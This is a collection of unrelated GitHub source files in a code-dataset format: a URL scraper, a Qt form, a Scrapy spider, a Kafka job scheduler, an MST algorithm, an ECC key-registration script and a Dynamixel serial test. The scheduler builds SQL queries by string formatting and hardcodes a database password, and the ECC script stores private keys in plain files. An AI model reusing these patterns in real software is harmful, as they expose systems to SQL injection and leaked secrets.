try:\n target = urljoin(base_url, target.strip())\n except Exception:\n continue\n\n form_params = []\n form_params_append = form_params.append\n for params in form.findAll(\"input\"):\n if params.get(\"type\") == \"submit\":\n continue\n\n form_params_append({\n \"name\": params.get(\"name\", \"NAME\"),\n \"value\": params.get(\"value\", \"VALUE\"),\n \"type\": params.get(\"type\", \"TYPE\")})\n\n # Add to results\n result_append((target, method, form_params))\n\n return result\n\n\n#------------------------------------------------------------------------------\ndef extract_from_html(raw_html, base_url, only_links = True):\n \"\"\"\n Extract URLs from HTML.\n\n Implementation notes:\n\n - The current implementation is fault tolerant, meaning it will try\n to extract URLs even if the HTML is malformed and browsers wouldn't\n normally see those links. This may therefore result in some false\n positives.\n\n - HTML5 tags are supported, including tags not currently supported by\n any major browser.\n\n :param raw_html: Raw HTML data.\n :type raw_html: str\n\n :param base_url: Base URL for the current document.\n :type base_url: str\n\n :param only_links: If True, only extract links to other resources.\n If False, extract all URLs.\n :type only_links: bool\n\n :returns: Extracted URLs.\n :rtype: set(str)\n \"\"\"\n\n # Set where the URLs will be collected.\n result = set()\n add_result = result.add\n\n # Remove the fragment from the base URL.\n base_url = urldefrag(base_url)[0]\n\n # Parse the raw HTML.\n bs = BeautifulSoup(decode(raw_html, detect(raw_html)[\"encoding\"]),\n convertEntities = BeautifulSoup.ALL_ENTITIES)\n\n # Some sets of tags and attributes to look for.\n href_tags = {\"a\", \"link\", \"area\"}\n src_tags = {\"script\", \"img\", \"iframe\", \"frame\", \"embed\", \"source\", \"track\"}\n param_names = {\"movie\", \"href\", \"link\", \"src\", \"url\", \"uri\"}\n\n # Iterate once through all tags...\n for tag in bs.findAll():\n\n # Get the tag name, case insensitive.\n name = tag.name.lower()\n\n # Extract the URL from each tag that has one.\n url = None\n if name in href_tags:\n url = tag.get(\"href\", None)\n elif name in src_tags:\n url = tag.get(\"src\", None)\n elif name == \"param\":\n name = tag.get(\"name\", \"\").lower().strip()\n if name in param_names:\n url = tag.get(\"value\", None)\n ##elif name == \"form\":\n ## url = tag.get(\"action\", None)\n elif name == \"object\":\n url = tag.get(\"data\", None)\n elif name == \"applet\":\n url = tag.get(\"code\", None)\n elif name == \"meta\":\n name = tag.get(\"name\", \"\").lower().strip()\n if name == \"http-equiv\":\n content = tag.get(\"content\", \"\")\n p = content.find(\";\")\n if p >= 0:\n url = content[ p + 1 : ]\n elif name == \"base\":\n url = tag.get(\"href\", None)\n if url is not None:\n\n # XXX FIXME\n # Unicode URLs are not supported.\n try:\n url = str(url)\n except Exception:\n warn(\"Unicode URLs not yet supported: %r\" % url)\n continue\n\n # Update the base URL.\n try:\n base_url = urljoin(base_url, url.strip(),\n allow_fragments = False)\n except Exception:\n continue\n\n # If we found an URL in this tag...\n if url is not None:\n\n # XXX FIXME\n # Unicode URLs are not supported.\n try:\n url = str(url)\n except Exception:\n warn(\"Unicode URLs not yet supported: %r\" % url)\n continue\n\n # Canonicalize the URL.\n try:\n url = urljoin(base_url, url.strip())\n except Exception:\n continue\n\n # Discard URLs that are not links to other pages or resources.\n if not only_links or is_link(url, base_url = 
base_url):\n\n # Add the URL to the set.\n add_result(url)\n\n # Return the set of collected URLs.\n return result\n\n\n#------------------------------------------------------------------------------\ndef extract(raw_data, content_type, base_url, only_links = True):\n \"\"\"\n Extract URLs from raw data.\n\n Implementation notes:\n\n - Unicode URLs are currently not supported.\n\n - The current implementation is fault tolerant, meaning it will try\n to extract URLs even if the HTML is malformed and browsers wouldn't\n normally see those links. This may therefore result in some false\n positives.\n\n - HTML5 tags are supported, including tags not currently supported by\n any major browser.\n\n :param raw_data: Raw data.\n :type raw_data: str\n\n :param content_type: MIME content type.\n :type content_type: str\n\n :param base_url: Base URL for the current document.\n :type base_url: str\n\n :param only_links: If True, only extract links to other resources.\n If False, extract all URLs.\n :type only_links: bool\n\n :returns: Extracted URLs.\n :rtype: set(str)\n \"\"\"\n\n # Sanitize the content type.\n content_type = content_type.strip().lower()\n if \";\" in content_type:\n content_type = content_type[ content_type.find(\";\") : ].strip()\n\n # HTML parser.\n if content_type == \"text/html\":\n urls = extract_from_html(raw_data, base_url, only_links)\n urls.update( extract_from_text(raw_data, base_url, only_links) )\n return urls\n\n # Generic plain text parser.\n if content_type.startswith(\"text/\"):\n return extract_from_text(raw_data, base_url, only_links)\n\n # Unsupported content type.\n return set()\n","repo_name":"golismero/golismero","sub_path":"golismero/api/net/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":12983,"program_lang":"python","lang":"en","doc_type":"code","stars":838,"dataset":"github-code","pt":"75"} +{"seq_id":"46649376772","text":"from PySide6.QtQml import QQmlApplicationEngine\nfrom PySide6.QtGui import QGuiApplication\nfrom PySide6.QtCore import QObject, Slot\nimport json\n\nimport sys, os\n\nAPP_ROOT = os.path.dirname(__file__)\nMAIN_QML = os.path.join(APP_ROOT, \"main.qml\")\n\n\nclass UserDataSaver(QObject):\n @Slot(str, str, str, str, str)\n def save_data(self, name, email, phone, address, about):\n user_data = {\n \"name\": name, \n \"email\": email, \n \"phone\": phone, \n \"address\": address, \n \"about\": about\n }\n\n with open(\"user_data.json\", \"w\") as f:\n json.dump(user_data, f)\n\n print(\"Data saved!\")\n\n\nclass RegistrationForm:\n def __init__(self) -> None:\n self.app = QGuiApplication(sys.argv)\n self.engine = QQmlApplicationEngine()\n self.root_context = self.engine.rootContext()\n\n self.user_data_save = UserDataSaver()\n self.root_context.setContextProperty(\"UserDataSaver\", self.user_data_save)\n\n self.engine.load(MAIN_QML)\n\n if not self.engine.rootObjects():\n sys.exit(-1)\n\n sys.exit(self.app.exec())\n\n\nif __name__ == \"__main__\":\n RegistrationForm()","repo_name":"robertvari/Qt_basics-230902","sub_path":"RegistrationForm_QtQuick.py","file_name":"RegistrationForm_QtQuick.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33590661327","text":"from scrapy import Spider, Request\nfrom scrapy.http import FormRequest\nfrom .exceptions import BricolageScraperError\nimport re\nimport json\n\n\nclass QuotesSpider(Spider):\n\n \"\"\"\n Scraps items from www.mr-bricolage.bg and stores them to 
scraped_items.json\n To run the spider run from the terminal:\n scrapy crawl bricolage -a cat=CAT_NAME_WITHOUT_WHITESPACES\n Use \"-\" instead of white spaces for the category parameter.\n\n Class vars:\n\n :name: spider name, used to run the spider\n :cat: category for scraping\n :item_id: the sequence number of the scrapped items\n :passed_first_results_page: Indicates if the first\n page with item results is processed.\n Used to prevent double loading of the\n same first page in parse_items_pages()\n :tmp: stores the parsed items before sending\n them to the pipeline\n :home_url: Base url of the website to start scraping from\n :long_: Longitude coordinates\n :lat: Latitude coordinates,\n :found_cat: Indicates if the target subcategory is found\n \"\"\"\n\n name = \"bricolage\"\n cat = None\n item_id = 0\n passed_first_results_page = False\n tmp = []\n home_url = 'https://mr-bricolage.bg'\n long_ = None\n lat = None\n found_cat = False\n\n def __init__(self, cat=None):\n \"\"\" Assigns the category for parsing to an object var.\n\n params:\n :param cat: Category name with \"-\" instead of whitespaces\n :type cat: str \"\"\"\n\n if cat is None:\n err = \"\\nUsage: scrapy crawl bricolage -a cat=CAT_NAME_WITHOUT_WHITESPACES\"\n self.alert(err)\n self.cat = cat.replace(\"-\", \" \")\n\n def start_requests(self):\n \"\"\" Overwrites the scrapy.Spider start_requests() function and\n parses initialy https://mr-bricolage.bg/wro/all_responsive.js\n with a higher priority. From this page are extracted longitude\n and latitude, which are later needed to get store availability\n of the scraped items. The second page for processing is the main\n page which is later crawled for links and processed further in the\n callbacs chain. \"\"\"\n\n self.start_urls = [\n self.home_url,\n self.home_url + '/wro/all_responsive.js'\n ]\n for priority, url in enumerate(self.start_urls):\n yield Request(url=url, priority=priority, callback=self.parse)\n\n def parse(self, response):\n \"\"\" Yields the initial pages parsing from the corresponding function:\n either long/lat extraction or category extraction. \"\"\"\n\n if response.url != self.home_url:\n for _ in self.parse_long_lat(response):\n yield _\n else:\n for cat in self.parse_cats(response):\n yield cat\n\n def parse_long_lat(self, response):\n \"\"\" Parses the longitude and latitude needed\n for the store availability processing. \"\"\"\n\n try:\n self.lat = re.search('latitude:(\\-?[0-9]{1,2}\\.?[0-9]*)',\n response.text).group(1)\n self.long_ = re.search('longitude:(\\-?[0-9]{1,3}\\.?[0-9]*)',\n response.text).group(1)\n except AttributeError:\n msg = \"\\nCan't extract lat/long coordinates,\"\n msg += \" items availability will not be parsed.\"\n self.alert(msg, False)\n yield None\n\n def parse_cats(self, response):\n \"\"\" Parses the main categories and after that recursively calls itself\n with a meta var, indicating to parse the subcategories of each main\n category until the target category is found. 
Once the target category\n is found, send its link to parse_items_pages() which extracts the pages\n links and the product items.\n \"\"\"\n\n if response.meta.get('cat_type') != \"sub_cat\":\n cssSelector = 'span.yCmsComponent > a.item::attr(href)'\n main_cats = list(map(self.url, response.css(cssSelector).extract()))\n for main_cat in main_cats:\n yield Request(url=main_cat,\n callback=self.parse_cats,\n meta={'cat_type': 'sub_cat'})\n elif not self.found_cat:\n cats = response.css('a[title=\"%s\"]::attr(href)' % self.cat).extract()\n if cats:\n self.found_cat = True\n yield Request(url=self.url(cats[0]), callback=self.parse_items_pages)\n else:\n yield None\n\n def parse_items_pages(self, response):\n \"\"\"\n 1) Extracts the item links from the first page of the target category\n and sends them for parsing to parse_item()\n 2) Extract the next page links of the category from the first page and\n send them recursively to itself for item link extraction as in 1)\n \"\"\"\n\n links = response.css('a[href*=\"/p/\"][title]::attr(href)').extract()\n for link in links:\n yield Request(self.url(link), callback=self.parse_item)\n if not self.passed_first_results_page:\n self.passed_first_results_page = True\n page_num_url_init_string = response.url.replace(self.start_urls[0], \"\")\n page_num_url_init_string += \"?q=%3Arelevance&page=\"\n pages = response.css('a[class=\"\"][href*=\"%s\"]::attr(href)' %\n page_num_url_init_string).extract()\n for page in pages:\n yield Request(self.url(page), callback=self.parse_items_pages)\n\n def parse_item(self, response):\n \"\"\"\n Scraps:\n - the item price (called 'productcart' on the site),\n - the item name,\n - the item img url\n - vars needed to be sent to the 'actionurl' in order to get the stores availability\n Stores the items data in self.tmp[]\n Yields:\n The POST request to 'actionurl' for getting the store availability\n \"\"\"\n\n csrft_token = str(response.css('input[name=\"CSRFToken\"]::attr(value)').extract_first())\n selector_keys = '.product-classifications table tr :nth-child(1)'\n selector_vals = '.product-classifications table tr :nth-child(2)'\n characteristics_keys = response.css(selector_keys).extract()\n characteristics_vals = response.css(selector_vals).extract()\n res = {\n 'characteristics': dict(zip(characteristics_keys,\n characteristics_vals))\n }\n\n stock_fields = [\n \"cartpage\",\n \"entryNumber\",\n \"productname\",\n \"productcart\",\n \"img\",\n \"actionurl\"\n ]\n for field in stock_fields:\n res.update({\n field: str(response.css('a[href=\"#stock\"]::attr(data-%s)' %\n field).extract_first())\n })\n self.tmp.append(res)\n frmdata = {\n \"locationQuery\": \"\",\n \"cartPage\": res[\"cartpage\"],\n \"entryNumber\": res[\"entryNumber\"] if res[\"entryNumber\"] != \"None\" else \"0\",\n \"latitude\": self.lat,\n \"longitude\": self.long_,\n \"CSRFToken\": csrft_token\n }\n if self.lat is not None:\n yield FormRequest(self.url(res[\"actionurl\"]),\n callback=self.store_availability,\n method='POST', formdata=frmdata)\n else:\n yield self.tmp[self.item_id]\n self.item_id += 1\n\n def store_availability(self, response):\n \"\"\" Scraps the store availability of the item\n and send the item to the pipeline. 
\"\"\"\n\n stores = json.loads(response.text)[\"data\"]\n availability = [\n {\n store[\"displayName\"]:store[\"stockPickup\"].split(\" \")[0]\n } for store in stores\n ]\n self.tmp[self.item_id].update({\"availability\": availability})\n yield self.tmp[self.item_id]\n self.item_id += 1\n\n def url(self, link):\n \"\"\"\n Adds as a prefix the base URL of the target website to the parsed links.\n\n params:\n :param link: The link to which is added the prefix.\n :type link: str \"\"\"\n\n return self.home_url + link\n\n def alert(self, msg, is_fatal=True):\n \"\"\"\n Sends error alerts via SMS or email.\n Modify this function according to your own alert system style.\n\n params:\n\n :param msg: The error message\n :type msg: str\n :param is_fatal: if True, stops the script execution\n by raising an error, if False, goes on\n :type is_fatal: bool \"\"\"\n\n pass\n if not is_fatal:\n print(msg)\n else:\n raise BricolageScraperError(msg)\n","repo_name":"pastet89/bricolage-scraper","sub_path":"bricolage/spiders/bricolage.py","file_name":"bricolage.py","file_ext":"py","file_size_in_byte":9027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2184997414","text":"import psycopg2, sys, json, socket\nfrom confluent_kafka import Producer, Consumer, KafkaError, KafkaException\n\nconn = psycopg2.connect(database=\"scheduler\", user = \"postgres\", password = \"postgrespw\", host = \"host.docker.internal\", port = \"32768\")\ncur = conn.cursor()\n\nconsumer_conf = {\n 'bootstrap.servers': \"localhost:9092\",\n 'group.id': 'sched-job-complete',\n 'auto.offset.reset': 'smallest',\n 'client.id': socket.gethostname(),\n 'enable.auto.commit': 'false'\n}\n\nproducer_conf = {\n 'bootstrap.servers': \"localhost:9092\",\n 'client.id': socket.gethostname()\n}\n\nconsumer = Consumer(consumer_conf)\nproducer = Producer(producer_conf)\nrunning = True\n\ndef msg_process(msg):\n # Get message contents\n vals = json.loads(msg.value())\n\n # Update job_status table with message content\n sql = 'insert into job_status (timestamp, job_id, status, message) VALUES (\\'%s\\',%s,\\'%s\\',\\'%s\\');' % (vals[\"timestamp\"], vals[\"job_id\"], vals[\"status\"], vals[\"message\"])\n cur.execute(sql)\n print(sql)\n conn.commit()\n\n # Get next jobs that can run now\n sql = 'select next_job_id, job_type_name from next_job'\n cur.execute(sql)\n next_jobs = cur.fetchall()\n for job in next_jobs:\n sql = 'insert into job_status (timestamp, job_id, status, message) VALUES (\\'%s\\',%s,\\'%s\\',\\'%s\\');' % ('now()', job[0], 'Queued', '')\n print(sql)\n cur.execute(sql)\n producer.produce('sched-'+job[1]+'-start', value='{\"job_id\":\"%s\"}' % (job[0]))\n\n conn.commit()\n producer.flush()\n\n return True\n\ntry:\n consumer.subscribe(['sched-job-complete'])\n\n while running:\n msg = consumer.poll(timeout=1.0)\n if msg is None: continue\n\n if msg.error():\n if msg.error().code() == KafkaError._PARTITION_EOF:\n # End of partition event\n sys.stderr.write('%% %s [%d] reached end at offset %d\\n' % (msg.topic(), msg.partition(), msg.offset()))\n elif msg.error():\n raise KafkaException(msg.error())\n else:\n if msg_process(msg):\n consumer.commit(asynchronous=False)\nfinally:\n # Close down consumer to commit final offsets.\n cur.close()\n consumer.close()\n 
print('Exiting')\n\n","repo_name":"jreal1/sched","sub_path":"job-type/sched-job-complete.py","file_name":"sched-job-complete.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41594500782","text":"from heapq import heappush, heappop\n\nV, E = map(int, input().split())\nadjacents = [[] for _ in range(V + 1)]\n\n# edge 구조는 [노드,비용]\nfor _ in range(E):\n a, b, c = map(int, input().split())\n adjacents[a].append([b, c])\n adjacents[b].append([a, c])\n\nvisited = [False] * (V + 1)\nheap = []\nfor node, cost in adjacents[1]:\n heappush(heap, (cost, node))\n\nanswer = 0\n# 시작 노드 방문처리\nvisited[1] = True\nwhile heap:\n # 항상 아직 연결되지 않은 노드들을 향하�� 엣지 중 가중치가 최소 순서로 가져온다.\n sCost, sNode = heappop(heap)\n\n # 그리고 아직 연결되지 않은 노드를 향하는 최소 엣지라면 방문 처리 후 결과 업데이트\n # 이미 연결된 노드라면 그냥 패스\n if not visited[sNode]:\n visited[sNode] = True\n answer += sCost\n else:\n continue\n\n # 인접 노드들 중 아직 연결되지 않은 노드들만 추가\n for adjacent, cost in adjacents[sNode]:\n # 연결된 노드와 인접한 노드들로 향하는 엣지들 중 아직 연결되지 않은 노드에 대해서만 추가한다.\n if not visited[adjacent]:\n heappush(heap, (cost, adjacent))\n\nprint(answer)\n","repo_name":"saehoon0501/AFJ","sub_path":"graph_traversal/최소 스패닝 트리(백준 1197).py","file_name":"최소 스패닝 트리(백준 1197).py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"74114651762","text":"import ECC\nimport hashlib\nimport time\nfrom random import SystemRandom \nrand=SystemRandom()\ncurve=ECC.secp256k1\n\ndef Init():\n \n ID_CR=rand.getrandbits(256)%curve.p\n ID_GSS=rand.getrandbits(256)%curve.p\n rCR = rand.getrandbits(256)%curve.p\n PubCR = curve.mul(curve.G,rCR)\n\n\n fp=open('CR.txt','a')\n fp.write(str(ID_CR)+'\\n')\n fp.write(str(rCR)+'\\n')\n fp.close()\n fp=open('GSS.txt','a')\n fp.write(str(ID_GSS)+'\\n')\n fp.close()\n fp=open('pub.txt','a')\n fp.write(str(PubCR)+'\\n')\n fp.close()\n fp=open('ID.txt','a')\n fp.write(str(ID_CR)+'\\n')\n fp.write(str(ID_GSS)+'\\n')\n fp.close()\n fp=open('multivariate.txt','a')\n for i in range(0,6):\n Aij = rand.getrandbits(256)%curve.p\n fp.write(str(Aij)+'\\n')\n fp.close()\n\n\ndef CR_to_DR1():\n ID_DRj=rand.getrandbits(256)%curve.p\n fp=open('DR.txt','a')\n fp.write(str(ID_DRj)+'\\n')\n fp.close()\n fp=open('ID.txt','a')\n fp.write(str(ID_DRj)+'\\n')\n fp.close()\n \n fp=open('CR.txt','r')\n l=fp.readlines()\n ID_CR = int(l[0])\n rCR=int(l[1])\n fp.close()\n fp=open('GSS.txt','r')\n l=fp.readlines()\n ID_GSS=int(l[0])\n fp.close()\n fp=open('pub.txt','r')\n l=fp.readlines()\n temp = l[0].split(',')\n xx = int(temp[0][1:])\n yy=int(temp[1].split(')')[0])\n PubCR = ECC.ECpoint(curve,xx,yy)\n fp.close()\n\n MKDRj=rand.getrandbits(256)%curve.p\n rDRj=rand.getrandbits(256)%curve.p\n PubDRj=curve.mul(curve.G,rDRj)\n TCDRj= ECC.hex2int(hashlib.sha256((str(MKDRj)+str(ID_DRj)+str(ID_CR)+str(ID_GSS)+str(int(time.time()))).encode(\"utf-8\")).hexdigest())\n Cert_DRj = (rDRj + ECC.hex2int(hashlib.sha256((str(PubDRj)+str(ID_GSS)+str(PubCR)).encode(\"utf-8\")).hexdigest())*rCR )\n fp=open('DR.txt','a')\n fp.write(str(TCDRj)+'\\n')\n fp.write(str(Cert_DRj)+'\\n')\n fp.write(str(PubDRj))\n fp.close()\n fp=open('pub.txt','a')\n fp.write(str(PubDRj)+'\\n')\n fp.close()\n\ndef CR_to_DR2():\n ID_DRj1=rand.getrandbits(256)%curve.p\n fp=open('DR1.txt','a')\n fp.write(str(ID_DRj1)+'\\n')\n fp.close()\n fp=open('ID.txt','a')\n fp.write(str(ID_DRj1)+'\\n')\n fp.close()\n \n fp=open('CR.txt','r')\n 
l=fp.readlines()\n ID_CR = int(l[0])\n rCR=int(l[1])\n fp.close()\n fp=open('GSS.txt','r')\n l=fp.readlines()\n ID_GSS=int(l[0])\n fp.close()\n fp=open('pub.txt','r')\n l=fp.readlines()\n temp = l[0].split(',')\n xx = int(temp[0][1:])\n yy=int(temp[1].split(')')[0])\n PubCR = ECC.ECpoint(curve,xx,yy)\n fp.close()\n\n MKDRj1=rand.getrandbits(256)%curve.p\n rDRj1=rand.getrandbits(256)%curve.p\n PubDRj1=curve.mul(curve.G,rDRj1)\n TCDRj1= ECC.hex2int(hashlib.sha256((str(MKDRj1)+str(ID_DRj1)+str(ID_CR)+str(ID_GSS)+str(int(time.time()))).encode(\"utf-8\")).hexdigest())\n Cert_DRj1 = (rDRj1 + ECC.hex2int(hashlib.sha256((str(PubDRj1)+str(ID_GSS)+str(PubCR)).encode(\"utf-8\")).hexdigest())*rCR )\n fp=open('DR1.txt','a')\n fp.write(str(TCDRj1)+'\\n')\n fp.write(str(Cert_DRj1)+'\\n')\n fp.write(str(PubDRj1))\n fp.close()\n fp=open('pub.txt','a')\n fp.write(str(PubDRj1)+'\\n')\n fp.close()\n\ndef CR_to_GSS():\n rGSS = rand.getrandbits(256)%curve.p \n PubGSS = curve.mul(curve.G,rGSS)\n fp=open('GSS.txt','r')\n l=fp.readlines()\n ID_GSS=int(l[0])\n fp.close()\n fp=open('CR.txt','r')\n l=fp.readlines()\n ID_CR = int(l[0])\n rCR=int(l[1])\n fp.close()\n fp=open('pub.txt','r')\n l=fp.readlines()\n temp = l[0].split(',')\n xx = int(temp[0][1:])\n yy=int(temp[1].split(')')[0])\n PubCR = ECC.ECpoint(curve,xx,yy)\n fp.close()\n Cert_GSS = (rGSS + ECC.hex2int(hashlib.sha256((str(PubGSS)+str(ID_GSS)+str(PubCR)).encode(\"utf-8\")).hexdigest())*rCR )\n TCGSS= ECC.hex2int(hashlib.sha256((str(ID_GSS)+str(ID_CR)+str(rGSS)+str(int(time.time()))).encode(\"utf-8\")).hexdigest())\n fp=open('GSS.txt','a')\n fp.write(str(TCGSS)+'\\n')\n fp.write(str(Cert_GSS)+'\\n')\n fp.write(str(PubGSS)+'\\n')\n fp.close()\n fp=open('pub.txt','a')\n fp.write(str(PubGSS)+'\\n')\n fp.close()\n\nInit()\nCR_to_DR1()\nCR_to_DR2()\nCR_to_GSS()\n","repo_name":"2019202009ankush/DroneSecurity","sub_path":"CR/Registration.py","file_name":"Registration.py","file_ext":"py","file_size_in_byte":4102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14894704108","text":"import struct\r\nimport os\r\nfrom socket import timeout\r\n\r\nif os.name == 'nt':\r\n import msvcrt\r\n def getch():\r\n return msvcrt.getch().decode()\r\nelse:\r\n import sys, tty, termios\r\n fd = sys.stdin.fileno()\r\n old_settings = termios.tcgetattr(fd)\r\n def getch():\r\n try:\r\n tty.setraw(sys.stdin.fileno())\r\n ch = sys.stdin.read(1)\r\n finally:\r\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\r\n return ch\r\n\r\nfrom dynamixel_sdk import * # Uses Dynamixel SDK library\r\nimport datetime\r\n\r\n\r\n############################ USER SCRIPT SETTINGS ###############################\r\n#################################################################################\r\n #\r\nUSART_SETTINGS = 0b10010000 #SET SETTINGS (use XFace manual) #\r\nDEVICE_NUMBER = 3 #SET NUMBER OF DEVICES (MIN 1) #\r\ntxbuf = [0x01, 0x02, 0x03] #SET TX BUFFER (any available length) #\r\n #\r\n#################################################################################\r\n\r\n\r\n# DXL settings\r\n\r\nPROTOCOL_VERSION = 1.0 # See which protocol version is used in the Dynamixel\r\nBROADCAST_ID = 0xFE\r\nDXL_ID = 161 # Dynamixel ID : 1\r\nBAUDRATE = 1000000 # Dynamixel default baudrate : 1000000\r\nDEVICENAME = '/dev/ttyS2' # Check which port is being used on your controller\r\n\r\n# XFACE registers map\r\n\r\nADDR_DEV_ID = 3\r\nADDR_SETTINGS = 34\r\nADDR_MODE_SELECT = 28\r\nADDR_DATA_LENGTH = 25\r\nADDR_BUF_A = 
26\r\nADDR_USART_ENABLE = 29\r\nADDR_STATUS_A = 35\r\n\r\n# XFACE settings\r\n\r\nMODE_UART_USARTM = 36\r\nMODE_USART_SLAVE = 37\r\n\r\ntxrx_result = 0\r\nSUCCESS = 1\r\n\r\nportHandler = PortHandler(DEVICENAME)\r\npacketHandler = PacketHandler(PROTOCOL_VERSION)\r\n\r\n\r\ndef port_open():\r\n # Open port\r\n os.system('../rs485 /dev/ttyS2 1')\r\n if portHandler.openPort():\r\n print(\"Succeeded to open the port\")\r\n else:\r\n print(\"Failed to open the port\")\r\n print(\"Press any key to terminate...\")\r\n getch()\r\n quit()\r\n\r\n # Set port baudrate\r\n if portHandler.setBaudRate(BAUDRATE):\r\n print(\"Succeeded to change the baudrate\")\r\n else:\r\n print(\"Failed to change the baudrate\")\r\n print(\"Press any key to terminate...\")\r\n getch()\r\n quit()\r\n print(\"\")\r\n\r\n####################### SHOW INFO ####################################\r\n\r\ndef show_info():\r\n print(\"INTERFACE SETTINGS:\")\r\n print(\"\")\r\n print(\"Number of devices:\", DEVICE_NUMBER)\r\n\r\n print (\"\")\r\n if(USART_SETTINGS & 0b10000000):\r\n print (\"MODE: USART\")\r\n print(\"CPOL =\", (USART_SETTINGS & 0b00000001))\r\n print(\"CPHA =\", ((USART_SETTINGS & 0b00000010)>>1))\r\n else:\r\n print (\"MODE: UART\")\r\n \r\n print (\"\")\r\n print(\"BAUDRATE:\")\r\n\r\n if (USART_SETTINGS & 0b00001000):\r\n print (\"9600\")\r\n elif (USART_SETTINGS & 0b00010000):\r\n print (\"19200\")\r\n elif ((USART_SETTINGS & 0b00011000) == 0b00011000):\r\n print (\"57600\")\r\n elif (USART_SETTINGS & 0b00100000):\r\n print (\"115200\")\r\n elif ((USART_SETTINGS & 0b00101000) == 0b00101000):\r\n print (\"200000\")\r\n elif ((USART_SETTINGS & 0b00110000) == 0b00110000):\r\n print (\"250000\")\r\n elif ((USART_SETTINGS & 0b00111000) == 0b00111000):\r\n print (\"400000\")\r\n elif (USART_SETTINGS & 0b01000000):\r\n print (\"500000\")\r\n elif ((USART_SETTINGS & 0b01001000) == 0b01001000):\r\n print (\"1000000\")\r\n\r\n print (\"\")\r\n print (\"WORD LENGTH:\")\r\n \r\n if(USART_SETTINGS & 0b00000100):\r\n print (\"9 BIT\")\r\n else:\r\n print (\"8 BIT\")\r\n\r\n print (\"\")\r\n\r\n####################### SET DEFAULT IDs ##############################\r\ndef set_def_id():\r\n\r\n dev_id = DXL_ID\r\n while dev_id < (DXL_ID+DEVICE_NUMBER):\r\n dev_id += 1\r\n \r\n dxl_comm_result = 1\r\n while dxl_comm_result != COMM_SUCCESS:\r\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, dev_id, 0, 0)\r\n\r\n print(\"DEVICE\", (dev_id-DXL_ID), \"found\")\r\n \r\n dxl_comm_result = 1\r\n while dxl_comm_result != COMM_SUCCESS:\r\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, dev_id, ADDR_DEV_ID, DXL_ID)\r\n\r\n print(\"Set default ID:\", DXL_ID, \"for DEVICE\", (dev_id-DXL_ID))\r\n \r\n #dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, BROADCAST_ID, ADDR_DEV_ID, DXL_ID)\r\n print(\"Disconnect devices\")\r\n print(\"\")\r\n\r\n###################### SET DIFFERENT IDs #############################\r\ndef id_set():\r\n dev_id = DXL_ID\r\n while dev_id < (DXL_ID+DEVICE_NUMBER):\r\n print(\"Connect DEVICE\", (dev_id-DXL_ID+1))\r\n while True: \r\n dev_id += 1\r\n\r\n dxl_comm_result = 1\r\n while dxl_comm_result != COMM_SUCCESS:\r\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, DXL_ID, 0, 0)\r\n\r\n print(\"DEVICE\", (dev_id-DXL_ID), \"found\")\r\n \r\n dxl_comm_result = 1\r\n while dxl_comm_result != COMM_SUCCESS:\r\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, DXL_ID, ADDR_DEV_ID, dev_id)\r\n \r\n print(\"Set 
ID:\", (dev_id), \"for DEVICE\", (dev_id-DXL_ID))\r\n break\r\n\r\n print(\"\")\r\n time.sleep(1)\r\n\r\n############################ USART SETTINGS ##########################\r\n\r\n\r\ndef usart_set(master_id, slave_id):\r\n\r\n dxl_comm_result = 1\r\n while dxl_comm_result != COMM_SUCCESS:\r\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, master_id , ADDR_MODE_SELECT, MODE_UART_USARTM)\r\n\r\n print(\"Mode selected for DEVICE\", (master_id - DXL_ID), \"with ID\", master_id)\r\n\r\n dxl_comm_result = 1\r\n while dxl_comm_result != COMM_SUCCESS:\r\n if(USART_SETTINGS & 0b10000000):\r\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, slave_id , ADDR_MODE_SELECT, MODE_USART_SLAVE)\r\n else:\r\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, slave_id , ADDR_MODE_SELECT, MODE_UART_USARTM)\r\n \r\n print(\"Mode selected for DEVICE\", (slave_id - DXL_ID), \"with ID\", slave_id)\r\n \r\n time.sleep(0.5)\r\n\r\n for id in master_id, slave_id:\r\n dxl_comm_result = 1\r\n while dxl_comm_result != COMM_SUCCESS:\r\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, id, ADDR_SETTINGS, USART_SETTINGS)\r\n \r\n print(\"Settings installed for DEVICE\", (master_id-DXL_ID), \"with ID\", id)\r\n\r\n time.sleep(0.5)\r\n\r\n print(\"\")\r\n\r\n###################### USART TRANSMIT (DEVICE 1) ########################\r\n\r\ndef usart_send(master_id, slave_id):\r\n\r\n for id in master_id, slave_id:\r\n dxl_comm_result = 1\r\n while dxl_comm_result != COMM_SUCCESS:\r\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, id, ADDR_DATA_LENGTH, len(txbuf))\r\n \r\n print(\"Length set for DEVICE\", (id - DXL_ID), \"with ID\", id)\r\n \r\n print (\"\")\r\n\r\n dxl_comm_result = 1\r\n while dxl_comm_result != COMM_SUCCESS:\r\n dxl_comm_result, dxl_error = packetHandler.writeTxRx(portHandler, master_id, ADDR_BUF_A, len(txbuf), txbuf)\r\n \r\n print(\"TX buffer set for DEVICE 1:\", txbuf, \"with ID\", master_id)\r\n print(\"\")\r\n \r\n for id in slave_id, master_id:\r\n dxl_comm_result = 1\r\n while dxl_comm_result != COMM_SUCCESS:\r\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, id, ADDR_USART_ENABLE, 2)\r\n \r\n print(\"Start transmitting\")\r\n 